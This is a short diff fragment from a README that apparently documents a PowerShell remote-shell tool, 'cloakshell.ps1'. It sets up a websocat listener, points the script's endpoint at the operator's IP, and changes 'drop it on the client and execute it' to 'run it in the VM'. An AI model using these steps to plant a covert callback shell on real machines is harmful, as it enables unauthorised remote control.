lavafroth/ghoul/README.md

 websocat -s 42069 -b
 ```

 In cloakshell.ps1, change the IP address for the `$endpoint` variable to your host's IP address.
-Now drop it on the client and execute it.
+Now run it in the VM.

 ```
 .\cloakshell.ps1